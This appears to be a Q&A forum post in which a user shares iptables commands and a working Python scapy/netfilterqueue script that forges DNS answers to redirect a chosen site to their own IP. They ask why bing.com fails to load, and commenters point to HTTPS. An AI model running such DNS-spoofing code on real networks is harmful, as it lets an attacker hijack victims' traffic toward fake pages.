# DNS spoofing doesn't redirect user to a fake page

Tags: python, dns, scapy, netfilter

I want to redirect user for example from bing.com to page with my IP. Every time when I start code it shows that DNS spoofing is working, but page not loading, page says that connection lost.

I'm working from Linux and wrote all commands in terminal like`sudo iptables -I OUTPUT -j NFQUEUE --queue-num 0` and `sudo iptables -I INPUT -j NFQUEUE --queue-num 0` then run the program

```
import optparse
import netfilterqueue
import scapy.all as scapy

def get_arguments():
    parser = optparse.OptionParser()
    parser.add_option("-i", "--ip", dest="ip", help="Your IP")
    parser.add_option("-w", "--website", dest="web_site", help="Web site that you want to spoof")
    arguments = parser.parse_args()[0]

    if not arguments.ip:
        parser.error("[-] Set your IP, use -h for more info")
    if not arguments.web_site:
        parser.error("[-] Set web site, use -h for more info")
    return arguments

def process_packet(packet):
    arguments = get_arguments()
    scapy_packet = scapy.IP(packet.get_payload())

    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if arguments.web_site in qname:
            answer = scapy.DNSRR(rrname=qname, rdata=arguments.ip)
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1

            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].chksum
            del scapy_packet[scapy.UDP].len

            packet.set_payload(str(scapy_packet))
            print("[+] Spoofing target")
    packet.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
```

[image: terminal output]
[image]
[image: bing.com doesn't response]
[image: duckduckgo response]

Comment: It’s a quite broad question :/ “It’s not working” isn’t really what StackOverflow is for, try to explain what you have tried / what exactly happens. You can also provide images, pcaps showing what happened during the session, or any additional infos (versions...) that will make answering such a question much easier :)

Comment: Ok. I think that it's a protection. Because other sites with HTTP redirect user to a fake page

Comment: Yeah, bing is clearly loaded as HTTPS on your post. DNS spoofing won’t bypass that